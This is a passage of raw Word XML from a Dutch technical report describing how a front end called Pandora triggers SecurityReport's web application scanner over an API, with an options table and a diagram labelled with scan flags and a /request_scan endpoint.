              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Volg regels van Robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7DFF" w14:paraId="058145A4"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29929CEE" w14:textId="4B594C84" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2998" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789B273B" w14:textId="3BD936AD" w:rsidR="003C7DFF" w:rsidRDefault="003C7DFF">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>fm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3159" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="733CFB4A" w14:textId="6004CF74" w:rsidR="003C7DFF" w:rsidRDefault="005F075B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Volg Modus</w:t>
            </w:r>
            <w:r w:rsidR="00ED7AB2">
              <w:t xml:space="preserve"> instellen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="504EC139" w14:textId="25EE840D" w:rsidR="00F1151B" w:rsidRDefault="008A368B">
      <w:r>
        <w:t>Tabel 4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FE711A" w14:textId="379DF668" w:rsidR="00F42980" w:rsidRDefault="00707F6F">
      <w:r>
        <w:t>Wanneer de gebruiker via Pandora een scan aanvraag doet executeert Pandora via de API een scan commando</w:t>
      </w:r>
      <w:r w:rsidR="00656854">
        <w:t xml:space="preserve"> uit in de webapplicatie scanner van SecurityReport</w:t>
      </w:r>
      <w:r w:rsidR="00290215">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6454BEED" w14:textId="14A98E1E" w:rsidR="00995B00" w:rsidRDefault="00995B00">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252583936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14B741C4" wp14:editId="4939EBB4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5000625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>833755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1016635" cy="1550035"/>
                <wp:effectExtent l="0" t="0" r="24765" b="24765"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="172" name="Text Box 172"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1016635" cy="1550035"/>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D95E77D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00656854" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00656854">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>options</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="78888A1C" w14:textId="65A81046" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-bs</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="654D8F72" w14:textId="7B8536C7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-s</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="66EB06A0" w14:textId="409358F8" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-x</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C0524F4" w14:textId="6FC8F27D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-h</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F5CC51B" w14:textId="5AFD2553" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-rt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6D230BD4" w14:textId="584AB04D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-r</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="158EF061" w14:textId="445A65B8" w:rsidR="002A05E5" w:rsidRPr="00D96E56" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>-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41C4" id="Text Box 172" o:spid="_x0000_s1107" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:393.75pt;margin-top:65.65pt;width:80.05pt;height:122.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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1D95E77D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00656854" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00656854">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>options</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="78888A1C" w14:textId="65A81046" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-bs</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="654D8F72" w14:textId="7B8536C7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-s</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="66EB06A0" w14:textId="409358F8" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-x</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3C0524F4" w14:textId="6FC8F27D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-h</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F5CC51B" w14:textId="5AFD2553" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-rt</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6D230BD4" w14:textId="584AB04D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-r</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="158EF061" w14:textId="445A65B8" w:rsidR="002A05E5" w:rsidRPr="00D96E56" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>-fm</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252587008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A3C89D0" wp14:editId="6B05667E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5005070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>492760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1015365" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="26035" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="176" name="Text Box 176"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1015365" cy="23114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6C0BEC" w14:textId="0CC4F184" w:rsidR="002A05E5" w:rsidRPr="006B2D29" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>scan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C89D0" id="Text Box 176" o:spid="_x0000_s1108" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:394.1pt;margin-top:38.8pt;width:79.95pt;height:18.2pt;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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3F6C0BEC" w14:textId="0CC4F184" w:rsidR="002A05E5" w:rsidRPr="006B2D29" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>scan url</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252585984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60FDFA19" wp14:editId="56789553">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5828665</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="229235" cy="2260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235" cy="2260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6902" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E8CC265" wp14:editId="72CDA67A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4942205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>216535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1145540" cy="2169160"/>
                <wp:effectExtent l="0" t="0" r="22860" b="15240"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="168" name="Rectangle 168"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1145540" cy="216916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AC3D" id="Rectangle 168" o:spid="_x0000_s1026" style="position:absolute;margin-left:389.15pt;margin-top:17.05pt;width:90.2pt;height:170.8pt;z-index:251686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" filled="f" strokecolor="#ffc000 [3207]" strokeweight="1pt">
                <w10:wrap type="square"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252567552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C0CF228" wp14:editId="3A8DF3C5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3221990</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>213995</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="571" name="Text Box 571"/>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DCEC7" w14:textId="46A9EE2C" w:rsidR="002A05E5" w:rsidRPr="006D73EA" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006D73EA">
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                              </w:rPr>
                              <w:t>/request_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CF228" id="Text Box 571" o:spid="_x0000_s1109" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:253.7pt;margin-top:16.85pt;width:75pt;height:18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C8AnkCAABkBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI21E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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="70DDCEC7" w14:textId="46A9EE2C" w:rsidR="002A05E5" w:rsidRPr="006D73EA" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006D73EA">
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                        </w:rPr>
                        <w:t>/request_scan</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687927" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48940EEC" wp14:editId="2A23CD76">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3162935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>216535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1145540" cy="1028700"/>
                <wp:effectExtent l="0" t="0" r="22860" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="167" name="Rectangle 167"/>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39FC2" id="Rectangle 167" o:spid="_x0000_s1026" style="position:absolute;margin-left:249.05pt;margin-top:17.05pt;width:90.2pt;height:81pt;z-index:251687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" filled="f" strokecolor="#ffc000 [3207]" strokeweight="1pt">
                <w10:wrap type="square"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252566528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0117D860" wp14:editId="5968F249">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2332990</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>332105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="810895" cy="810895"/>
            <wp:effectExtent l="0" t="0" r="1905" b="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4720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="375C7369" wp14:editId="1E2DAD95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1234440</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>106045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="227330" cy="443865"/>
                <wp:effectExtent l="0" t="6668" r="45403" b="45402"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="-634" y="21276"/>
                    <wp:lineTo x="21087" y="21276"/>
                    <wp:lineTo x="23501" y="6443"/>
                    <wp:lineTo x="23501" y="-973"/>
                    <wp:lineTo x="1780" y="1499"/>
                    <wp:lineTo x="-633" y="1499"/>
                    <wp:lineTo x="-634" y="21276"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="146" name="Bent Arrow 146"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="5400000">
                          <a:off x="0" y="0"/>
                          <a:ext cx="227330" cy="443865"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentArrow">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFD966"/>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3370" id="Bent Arrow 146" o:spid="_x0000_s1026" style="position:absolute;margin-left:97.2pt;margin-top:8.35pt;width:17.9pt;height:34.95pt;rotation:90;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443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" path="m0,443865l0,127873c0,72944,44528,28416,99457,28416l170498,28416,170498,,227330,56833,170498,113665,170498,85249,99457,85249c75916,85249,56833,104332,56833,127873l56833,443865,,443865xe" fillcolor="#ffd966" strokecolor="#ffc000 [3207]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,443865;0,127873;99457,28416;170498,28416;170498,0;227330,56833;170498,113665;170498,85249;99457,85249;56833,127873;56833,443865;0,443865" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252564480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11EEF938" wp14:editId="75AD8E01">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>243205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>212090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="566420" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="560" name="Text Box 560"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5664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EC9FA5" w14:textId="4D085A4D" w:rsidR="002A05E5" w:rsidRPr="009A3D6F" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>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EF938" id="Text Box 560" o:spid="_x0000_s1110" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:19.15pt;margin-top:16.7pt;width:44.6pt;height:18pt;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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1DEC9FA5" w14:textId="4D085A4D" w:rsidR="002A05E5" w:rsidRPr="009A3D6F" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Scan</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688952" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E1CF830" wp14:editId="7BE40555">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-139700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>214630</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1145540" cy="1028700"/>
                <wp:effectExtent l="0" t="0" r="22860" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21867"/>
                    <wp:lineTo x="21552" y="21867"/>
                    <wp:lineTo x="21552" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="556" name="Rectangle 556"/>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0F704" id="Rectangle 556" o:spid="_x0000_s1026" style="position:absolute;margin-left:-11pt;margin-top:16.9pt;width:90.2pt;height:81pt;z-index:251688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" filled="f" strokecolor="#ffc000 [3207]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252561408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07385C7B" wp14:editId="2BC9E85D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>50165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>557530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="756920" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="30480" b="27940"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="534" name="Text Box 534"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="756920" cy="2260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D7B4501" w14:textId="0EBEBCA7" w:rsidR="002A05E5" w:rsidRPr="009A3D6F" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Full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C7B" id="Text Box 534" o:spid="_x0000_s1111" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:3.95pt;margin-top:43.9pt;width:59.6pt;height:1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" filled="f" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7D7B4501" w14:textId="0EBEBCA7" w:rsidR="002A05E5" w:rsidRPr="009A3D6F" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Full Scan</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252562432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="285ADA47" wp14:editId="623BD0E6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>50165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>905510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="756920" cy="228600"/>
